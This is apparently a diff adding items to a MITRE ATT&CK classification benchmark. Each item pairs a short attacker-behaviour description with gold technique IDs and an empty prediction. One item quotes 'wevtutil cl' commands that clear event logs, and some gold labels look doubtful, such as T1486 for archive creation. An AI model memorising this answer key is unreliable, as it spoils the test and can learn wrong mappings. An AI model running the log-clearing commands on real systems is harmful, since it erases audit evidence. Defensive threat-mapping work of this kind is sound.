+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "enumerates running processes to search for Wireshark and Windows Sysinternals suite.",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "establishes persistence by creating a shortcut in the Start Menu folder.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "establishes persistence via a .lnk file in the victim\u2019s startup path.",
+ "gold": [
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "executes batch scripts on the victim\u2019s machine.",
+ "gold": [
+ "T1064"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "exfiltrates data collected from the victim mobile device.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "exfiltrates data over its C2 channel.",
+ "gold": [
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "exfiltrates data to its C2 server over the same protocol as C2 communications.",
+ "gold": [
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "exfiltrates files over FTP.",
+ "gold": [
+ "T1048"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "extracts basic information about the operating system.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"For C2 over HTTP, encodes data with base64 and sends it via the \"\"Cookie\"\" field of HTTP requests. For C2 over DNS, converts ASCII characters into their hexadecimal values and sends the data in cleartext.\"",
+ "gold": [
+ "T1132"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Freenki malware lists running processes using the Microsoft Windows API.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "functions as a proxy server between the victim and C2 server.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers and beacons the MAC and IP addresses during installation.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers computer name and information using the systeminfo command.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers credentials in files for chrome, 1password, and keychains.",
+ "gold": [
+ "T1552.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers information about the OS architecture, OS name, and OS version/Service pack.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers information on the system and local drives.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers information on victim\u2019s drives and has a plugin for document listing.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "gathers the local IP address.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "generates a false TLS handshake using a public certificate to disguise C2 network communications.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Get-MicrophoneAudio Exfiltration module can record system microphone audio.",
+ "gold": [
+ "T1123"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "harvests plain-text credentials as a password filter registered on domain controllers.",
+ "gold": [
+ "T1556.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command named $screenshot that may be responsible for taking screenshots of the victim machine.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command to collect victim system information, including the system name and OS version.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command to create, set, copy, or delete a specified Registry key or value.",
+ "gold": [
+ "T1112"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command to create Registry entries for storing data under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath.",
+ "gold": [
+ "T1112"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command to return a directory listing for a specified directory.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a feature to list the available services on the system.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a hard-coded primary and backup C2 string.",
+ "gold": [
+ "T1008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.",
+ "gold": [
+ "T1011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a plugin for VNC and Ammyy Admin Tool.",
+ "gold": [
+ "T1219"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a tool that can delete files.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a tool that can obtain information about the local system.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a tool that creates a new service for persistence.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has a VBScript for execution.",
+ "gold": [
+ "T1064"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has batch files that modify the system service COMSysApp to load a malicious DLL.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has been known to dump credentials.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has been known to side load DLLs with a valid version of Chrome with one of their tools.",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList {42aedc87-2188-41fd-b9a3-0c966feabec1} or Microsoft WBEM New Event Subsystem {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} depending on the system's CPU architecture.",
+ "gold": [
+ "T1546.015"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.",
+ "gold": [
+ "T1070"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has cleared event logs from victims.",
+ "gold": [
+ "T1070"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.",
+ "gold": [
+ "T1039"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has created password-protected RAR, WinImage, and zip archives to be exfiltrated.",
+ "gold": [
+ "T1486",
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has created scheduled tasks that run a VBScript to execute a payload on victim machines.",
+ "gold": [
+ "T1053.005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.",
+ "gold": [
+ "T1189"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has downloaded and executed additional plugins.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has dropped binaries as files named microsoft_network.exe and crome.exe.",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has encrypted its payload with RC4.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
